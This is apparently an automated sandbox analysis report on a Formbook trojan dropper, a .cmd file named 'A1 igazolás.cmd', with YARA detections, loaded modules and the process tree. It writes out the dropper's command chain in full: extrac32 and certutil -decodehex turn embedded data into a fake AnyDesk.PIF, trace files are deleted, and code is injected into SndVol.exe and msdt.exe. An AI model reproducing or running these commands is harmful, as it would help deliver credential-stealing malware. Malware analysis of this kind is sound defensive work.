          Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: AnyDesk.PIF PID: 8064, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: SndVol.exe PID: 7528, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: msdt.exe PID: 4040, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.bank.troj.evad.winCMD@35/15@12/1
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E94232B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,4_2_00007FF6E94232B0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle,7_2_00007FF6854F826C
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E944FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,4_2_00007FF6E944FB54
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5AD98 CreateToolhelp32Snapshot,10_2_02D5AD98
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854546C0 CoCreateInstance,#357,SysFreeString,7_2_00007FF6854546C0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854D6320 FindResourceW,GetLastError,#357,LoadResource,GetLastError,LockResource,GetLastError,7_2_00007FF6854D6320
          Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeMutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4152:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
          Source: C:\Users\Public\Libraries\AnyDesk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: A1 igazol#U00e1s.cmdReversingLabs: Detection: 15%
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
          Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
          Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIF
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
          Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aoikokpI.cmd" "
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
          Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\SndVol.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIFJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S Jump to behavior
          Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
          Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\A1 igazol#U00e1s.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
          Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aoikokpI.cmd" "Jump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\SndVol.exe"Jump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: version.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: olepro32.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: url.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ieframe.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: userenv.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: netutils.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: amsi.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: sppc.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: learning_tools.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: winmm.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: wininet.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: wldp.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: profapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: winhttpcom.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: webio.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: schannel.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??????????.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??????????.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??????????.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??l.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??l.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ????.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ???e???????????.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ???e???????????.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??????????.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??l.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??l.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ???.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ???.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ???.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??l.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ????.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??l.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??l.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: tquery.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: cryptdll.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: spp.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: vssapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: vsstrace.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: spp.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: vssapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: vsstrace.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: advapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: advapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: advapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: advapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: advapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: advapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: advapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: spp.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: vssapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: vsstrace.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: sppwmi.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: slc.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: sppcext.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: winscard.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: devobj.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: esent.dllJump to behavior
          Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: atlthunk.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: mmdevapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: devobj.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: winmmbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: ksuser.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: avrt.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: audioses.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: msacm32.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: midimap.dllJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: A1 igazol#U00e1s.cmdStatic file information: File size 3839564 > 1048576
          Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: SndVol.pdbGCTL source: explorer.exe, 00000012.00000002.3881344388.000000000FF7F000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000014.00000002.3865958684.000000000538F000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000014.00000002.3863849789.00000000031D4000.00000004.00000020.00020000.00000000.sdmp
